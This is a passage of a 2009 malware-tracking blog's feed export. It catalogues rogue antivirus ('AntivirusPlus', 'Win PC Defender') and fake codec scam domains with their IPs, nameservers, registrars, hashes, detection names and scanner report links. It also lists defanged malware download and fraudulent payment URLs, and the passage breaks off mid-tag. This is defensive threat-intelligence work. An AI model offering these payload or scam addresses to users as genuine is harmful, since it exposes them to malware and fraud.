target="_blank"&gt;Redirection Analysis &lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-1794551099537672244?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/1794551099537672244'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/1794551099537672244'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p7.html' title='Black Hat SEO and Rogue Antivirus p.7'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_9YOi_bjoDL4/SdtS5nJD5hI/AAAAAAAAAYQ/Co0qXNZG2t8/s72-c/AS21788NOC.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-5024048828385217309</id><published>2009-04-04T23:02:00.000-07:00</published><updated>2009-04-06T07:15:32.345-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='hack website'/><category scheme='http://www.blogger.com/atom/ns#' term='fake av'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='thegreatsecurity.com'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='web poisoning'/><category scheme='http://www.blogger.com/atom/ns#' term='winwebsecurity'/><title type='text'>Rogueware AntivirusPlus - thegreatsecurity.com</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="518" height="626" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;
  &lt;td colspan="2" valign="top" height="561"&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;Rogueware AntivirusPlus - thegreatsecurity.com, todaybestscan.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Another list of malicious domain promoting rogue software associated with &amp;quot;AntivirusPlus&amp;quot;&lt;br /&gt;&lt;br /&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;  &lt;tr&gt;    &lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;hr /&gt;&lt;span class="scam_website"&gt;easyincomeprotection.cn&lt;/span&gt; (Also have 6 different template)&lt;br /&gt;&lt;span class="scam_website"&gt;bigdefense2u.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;easydefenseonline.cn&lt;/span&gt; &lt;br /&gt;&lt;span class="scam_website"&gt;easyincomeprotection.cn&lt;/span&gt; &lt;br /&gt;&lt;span class="scam_website"&gt;easypersonalprotection.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;examineillnesslive.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;freedefenseforyou.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;mycheckdiseasepro.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;mycheckdiseasestore.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;mydefense4u.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;mydefense4you.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;myguardforyou.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;newguard4u.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;newguard4you.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;refugepro.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;yourguard4you.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;yourguardforyou.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;yourguardonline.cn&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;yourguardpro.cn &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=190fc55b62d92d7e4c5f530e56ace2255&amp;amp;format=html"&gt;Anubis&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/3ad454086dcaf5b39567c1eda21943b5" target="_blank"&gt;VirusTotal&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;  Created 30-mar-2009 &lt;br /&gt;&lt;br /&gt;  Registered with  &amp;quot;广东时代互联科技有限公司&amp;quot; translated into english the result beeing:&lt;br /&gt;&lt;br /&gt;&amp;quot;Time Internet Technology Co., Ltd. Guangdong&amp;quot; also cited as registrar  for hosting SCAM websites here&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.bobbear.co.uk/DDK-Group-Inc.html" target="_blank"&gt;DDK-Group-Inc.&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.bobbear.co.uk/EFS-Capital-Group-Inc.html" target="_blank"&gt;EFS-Capital-Group-Inc&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.bobbear.co.uk/tdk-group-inc.html" target="_blank"&gt;tdk-group-inc&lt;/a&gt; &lt;br /&gt;&lt;a href="http://www.bobbear.co.uk/e-innovative-inc.html" target="_blank"&gt;e-innovative-inc &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;DNS: &lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;ns1.pubilcnameserver7.com&lt;/span&gt; [94.247.2.215]&lt;br /&gt;&lt;span class="scam_website"&gt;ns2.pubilcnameserver7.com&lt;/span&gt; [94.247.2.216]&lt;br /&gt;&lt;br /&gt; Using the same DNS we have:&lt;br /&gt; &lt;br /&gt; &lt;span class="scam_website"&gt;easyaddedantivirus.com&lt;/span&gt; [94.247.2.215]&lt;br /&gt; &lt;span class="scam_website"&gt;yourcountedantivirus.com&lt;/span&gt; [94.247.2.215]&lt;br /&gt;&lt;br /&gt;Created 30-mar-2009 &lt;br /&gt;&lt;br /&gt;Registrar used: BIZCN.COM, INC.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2q4eyiYvI/AAAAAAAAAEs/YPeco5Up8Fg/s1600-h/antivirus-plus-new.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 205px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2q4eyiYvI/AAAAAAAAAEs/YPeco5Up8Fg/s320/antivirus-plus-new.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Application screenshot (Alias: FakePlus)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sdgw5blSCiI/AAAAAAAAAWo/vEEA3ebKws0/s1600-h/AntivirusPlusSetup2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sdgw5blSCiI/AAAAAAAAAWo/vEEA3ebKws0/s320/AntivirusPlusSetup2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321056722953046562" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;span class="scam_website"&gt;topsoftscanner.com&lt;/span&gt; [209.44.126.14]&lt;br /&gt;&lt;br /&gt;Created 25-mar-2009&lt;br /&gt;&lt;br /&gt;No whois info - PrivacyProtect.org &lt;br /&gt;Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD&lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;thegreatsecurity.com&lt;/span&gt; [209.44.126.14]&lt;br /&gt;&lt;br /&gt;hxxp://golkis.dnip.net/online-j49/yornt.html&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=877ac4d842b4d77d426ff3b8eb93694d&amp;amp;t=1238846260&amp;amp;type=js" target="_blank"&gt;Javascrit Analysis&lt;/a&gt; by Wepawet&lt;br /&gt;&lt;br /&gt;Seen on Alexa&lt;br /&gt;  &amp;quot;The Google cache has been updated and the link has been removed.&amp;quot;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdfiwVBzd8I/AAAAAAAAAWQ/yt1UTY37ncY/s1600-h/thegreatsecurity.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 44px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdfiwVBzd8I/AAAAAAAAAWQ/yt1UTY37ncY/s320/thegreatsecurity.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320970804667840450" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Created 03-apr-2009 &lt;br /&gt;&lt;br /&gt;  No whois info - PrivacyProtect.org &lt;br /&gt;Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD &lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;checkonlinesecurity.com&lt;/span&gt; [209.44.126.14]&lt;br /&gt;&lt;br /&gt;Created 05-apr-2009&lt;br /&gt;&lt;br /&gt;No whois info - PrivacyProtect.org &lt;br /&gt;Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD &lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;todaybestscan.com&lt;/span&gt; [209.44.126.14]&lt;br /&gt;&lt;br /&gt;Created 05-apr-2009&lt;br /&gt;&lt;br /&gt;No whois info - PrivacyProtect.org &lt;br /&gt;Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD &lt;br /&gt;&lt;br /&gt;  Using these two DNS: &lt;br /&gt;&lt;br /&gt;&lt;u&gt;ns1.fuckmoneycash.com&lt;/u&gt; [209.44.126.15]&lt;br /&gt;&lt;u&gt;ns2.fuckmoneycash.com&lt;/u&gt; [209.44.126.16] &lt;br /&gt;&lt;br /&gt;  Title: &lt;i&gt;My computer Online Scan&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdeEYouqP7I/AAAAAAAAAWI/0YEWjlXDpX8/s1600-h/thegreatsecurity.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdeEYouqP7I/AAAAAAAAAWI/0YEWjlXDpX8/s320/thegreatsecurity.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320867043546382258" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Template used:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="27" height="40"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="491"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdgT6-oFJnI/AAAAAAAAAWg/R4Nu7dfQ1dQ/s1600-h/easyincomeprotection.cn-SCAM-AntivirusPlus-2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 280px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdgT6-oFJnI/AAAAAAAAAWg/R4Nu7dfQ1dQ/s320/easyincomeprotection.cn-SCAM-AntivirusPlus-2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321024863702689394" /&gt;&lt;/a&gt; &lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdgT6_UYKXI/AAAAAAAAAWY/FN9xh1SL9Ds/s1600-h/easyincomeprotection.cn-SCAM-AntivirusPlus.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 270px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdgT6_UYKXI/AAAAAAAAAWY/FN9xh1SL9Ds/s320/easyincomeprotection.cn-SCAM-AntivirusPlus.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321024863888484722" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;a rel="dofollow" target="_blank" href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sb2ujdPf9KI/AAAAAAAAAFM/WEU9pDOOxVk/s1600-h/onlinewebscan1-AntivirusPlus.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 276px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sb2ujdPf9KI/AAAAAAAAAFM/WEU9pDOOxVk/s320/onlinewebscan1-AntivirusPlus.jpg" border="0" alt="Template AntivirusPlus from onlinescanweb.com" id="BLOGGER_PHOTO_ID_5313595059535344802" /&gt;&lt;/a&gt;&lt;a rel="dofollow" target="_blank" href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sb2vIvT4dvI/AAAAAAAAAFc/R_BnYZJX0TQ/s1600-h/onlinewebscan-AntivirusPlus.jpg"&gt;&lt;br /&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sb2vIvT4dvI/AAAAAAAAAFc/R_BnYZJX0TQ/s320/onlinewebscan-AntivirusPlus.jpg" border="0" alt="Template AntivirusPlus from onlinescanweb.com" id="BLOGGER_PHOTO_ID_5313595700040726258" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2xgxaKqiI/AAAAAAAAAFs/UZcugywLCvU/s1600-h/onlinewebscan1-AntivirusPlus.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 276px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2xgxaKqiI/AAAAAAAAAFs/UZcugywLCvU/s320/onlinewebscan1-AntivirusPlus.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 1"id="BLOGGER_PHOTO_ID_5313598311944071714" /&gt;&lt;/a&gt; &lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2xgyPCNzI/AAAAAAAAAFk/6ekd03nleV4/s1600-h/onlinewebscan-AntivirusPlus.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2xgyPCNzI/AAAAAAAAAFk/6ekd03nleV4/s320/onlinewebscan-AntivirusPlus.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 1 bis"id="BLOGGER_PHOTO_ID_5313598312165816114" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2yPwkA8vI/AAAAAAAAAF0/O7dUhOGAM1Y/s1600-h/onlinescanweb.com-intro-RapidAntivirus.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 282px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2yPwkA8vI/AAAAAAAAAF0/O7dUhOGAM1Y/s320/onlinescanweb.com-intro-RapidAntivirus.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 1"id="BLOGGER_PHOTO_ID_5313599119170794226" /&gt;&lt;/a&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2yPwfmE9I/AAAAAAAAAF8/96TmSKBy7a8/s1600-h/onlinescanweb.com-RapidAntivirus.jpg"&gt;&lt;br /&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 243px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2yPwfmE9I/AAAAAAAAAF8/96TmSKBy7a8/s320/onlinescanweb.com-RapidAntivirus.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 1 bis"id="BLOGGER_PHOTO_ID_5313599119152255954" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2zPGBLDvI/AAAAAAAAAGE/7_7cL9QinWs/s1600-h/onlinescanweb.comRapidAntivirusTemplate.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 233px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2zPGBLDvI/AAAAAAAAAGE/7_7cL9QinWs/s320/onlinescanweb.comRapidAntivirusTemplate.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 2"id="BLOGGER_PHOTO_ID_5313600207261994738" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb20Jo9vdWI/AAAAAAAAAGM/MgDWKD6N3s8/s1600-h/onlinescanweb.com-RapidAntivirusTemplate3.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 275px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb20Jo9vdWI/AAAAAAAAAGM/MgDWKD6N3s8/s320/onlinescanweb.com-RapidAntivirusTemplate3.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 3"id="BLOGGER_PHOTO_ID_5313601213075256674" /&gt;&lt;/a&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb20KDtVLwI/AAAAAAAAAGU/PMhfeVZRz88/s1600-h/onlinescanweb.com-RapidAntivirusTemplate3bis.jpg"&gt;&lt;br /&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 260px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb20KDtVLwI/AAAAAAAAAGU/PMhfeVZRz88/s320/onlinescanweb.com-RapidAntivirusTemplate3bis.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 3 bis"id="BLOGGER_PHOTO_ID_5313601220254183170" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb21D3rwhEI/AAAAAAAAAGc/Z_AOubx4C18/s1600-h/onlinescanweb.com-AntivirusPlus_Template2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 314px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb21D3rwhEI/AAAAAAAAAGc/Z_AOubx4C18/s320/onlinescanweb.com-AntivirusPlus_Template2.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template"id="BLOGGER_PHOTO_ID_5313602213458773058" /&gt;&lt;/a&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sb21Dw9Z4GI/AAAAAAAAAGk/H6oFgE5kwbQ/s1600-h/onlinescanweb.com-AntivirusPlus_Template2bis.jpg"&gt;&lt;br /&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 255px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sb21Dw9Z4GI/AAAAAAAAAGk/H6oFgE5kwbQ/s320/onlinescanweb.com-AntivirusPlus_Template2bis.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 2"id="BLOGGER_PHOTO_ID_5313602211653738594" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-5024048828385217309?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/5024048828385217309'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/5024048828385217309'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/rogueware-antivirusplus.html' title='Rogueware AntivirusPlus - thegreatsecurity.com'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2q4eyiYvI/AAAAAAAAAEs/YPeco5Up8Fg/s72-c/antivirus-plus-new.com.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-7251306043532627424</id><published>2009-04-04T22:57:00.000-07:00</published><updated>2009-04-04T23:03:29.801-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='xp police antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='loyaldown10.com'/><category scheme='http://www.blogger.com/atom/ns#' term='loyaltube09.com'/><category scheme='http://www.blogger.com/atom/ns#' term='trojan insebro'/><category scheme='http://www.blogger.com/atom/ns#' term='loyaltube'/><category scheme='http://www.blogger.com/atom/ns#' term='fake codec'/><category scheme='http://www.blogger.com/atom/ns#' term='Fake Scanner'/><category scheme='http://www.blogger.com/atom/ns#' term='tubeloyaln.com'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='Win PC Defender'/><title type='text'>tubeloyaln.com Fake Codec and RogueAV Revisited</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="1224" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td colspan="2" valign="top" height="758"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;tubeloyaln.com Fake Codec and Rogue Antivirus revisited&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  The previous page which include 14 domain (10 active) is &lt;a href="http://malware-web-threats.blogspot.com/2009/03/loyaldown-loyaltube-fake-codec-and.html" target="_blank"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;/p&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;  &lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;u&gt;Fake codec and fake scanner page&lt;/u&gt;:&lt;br /&gt;&lt;br /&gt;hxxp://tubeloyaln.com/scan/?id=..&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6-7cbL0RI/AAAAAAAAAQI/C7I674PhTLE/s1600-h/loyaltube09.com-FakeScanner.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 271px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6-7cbL0RI/AAAAAAAAAQI/C7I674PhTLE/s320/loyaltube09.com-FakeScanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318398138422907154" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://tubeloyaln.com/tube/?id=197&amp;amp;title=adult+movie&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sdg1wVc98pI/AAAAAAAAAWw/qSckwx_tRwE/s1600-h/tubeloyaln.com-fake-codec.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 290px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sdg1wVc98pI/AAAAAAAAAWw/qSckwx_tRwE/s320/tubeloyaln.com-fake-codec.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321062064246878866" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;win-pc-defender.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sdg6kFLUtAI/AAAAAAAAAW4/KSQ4pXT_3M0/s1600-h/win-pc-defender.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 273px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sdg6kFLUtAI/AAAAAAAAAW4/KSQ4pXT_3M0/s320/win-pc-defender.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321067351277614082" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://winpcdown09.com/file.exe&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/27da52a50d8e8cf3213ef96a970cd4bd" target="_blank"&gt; VirusTotal&lt;/a&gt;: 14/40&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1412edcea7cac58b4593ac1e8c2fd0757" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;File size: 71680 bytes&lt;br /&gt;MD5...: ac10a8c9d0e7508beafa6f61c1af44bc&lt;br /&gt;&lt;br /&gt;Alias: &lt;span style="color:#FF0000"&gt;Win32/Insebro.A&lt;/span&gt; - &lt;span style="color:#FF0000"&gt;Adware.WinPCDefender&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;hxxp://winpcdown09.com/file.exe&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/cec611a2cd7a184f6dba817eb89d8e01" target="_blank"&gt;VirusTotal&lt;/a&gt;: 10/39&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1412edcea7cac58b4593ac1e8c2fd0757" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;&lt;a href="http://info.prevx.com/aboutprogramtext.asp?PX5=6C641AEF0030F4099A9C0F52D23B6300ECE58BEC" target="_blank"&gt;Prevx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;File size: 1022464 bytes&lt;br /&gt;MD5...: 34e1cd77554c06f9d24a6857f702b4fd&lt;br /&gt;&lt;br /&gt;Alias: &lt;span style="color:#FF0000"&gt;FakeAlert.IM&lt;/span&gt; -&lt;span style="color:#FF0000"&gt; Win32/FakeRean&lt;/span&gt; - &lt;span style="color:#FF0000"&gt;WinPCDefender&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=e66fb67721bcb6a6b47879e451ce905b" target="_blank"&gt;ThreatExpert&lt;/a&gt; (other file)&lt;br /&gt;Fraudulent payment system: hxxp://billingpayment.net/pp/?id= &lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;winpcdown09.com&lt;br /&gt;winpcdown99.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/c599f082cd2330a526afb9aaf2e0d15f" target="_blank"&gt;VirusTotal&lt;/a&gt;: 21/40&lt;br /&gt;&lt;a href="http://info.prevx.com/aboutprogramtext.asp?PX5=C5F95F4000E8ED498008012DDDE82A008FF2688D" target="_blank"&gt;Prevx&lt;/a&gt;&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=17eb2259b3146e8747922d55cd0d51d8a" target="_blank"&gt;Anubis &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;File size: 98304 bytes&lt;br /&gt;MD5...: d15e5bb28d5e4c31651efb32e000397f&lt;br /&gt;&lt;br /&gt;Alias: &lt;span style="color:#FF0000"&gt;Trojan:Win32/Alureon&lt;/span&gt; - &lt;span style="color:#FF0000"&gt;Win32.Tdss&lt;/span&gt; - &lt;span 